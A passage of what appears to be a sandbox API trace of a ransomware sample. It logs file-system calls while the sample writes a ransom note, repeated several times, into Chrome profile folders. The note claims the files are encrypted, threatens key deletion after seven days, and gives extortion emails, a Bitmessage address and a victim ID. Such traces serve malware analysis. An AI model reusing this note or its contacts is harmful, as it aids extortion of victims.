}}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.833] WriteFile (in: hFile=0x2e8, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.834] CloseHandle (hObject=0x2e8) returned 1 [0292.834] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\#readme_eman#.rtf")) returned 0x20 [0292.834] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\database\\#readme_eman#.rtf")) returned 0x20 [0292.834] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\scriptcache\\#readme_eman#.rtf")) returned 0x20 [0292.834] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\#readme_eman#.rtf")) returned 0x20 [0292.834] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\#readme_eman#.rtf")) returned 0xffffffff [0292.834] GetLastError () returned 0x2 [0292.834] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.835] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.835] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is 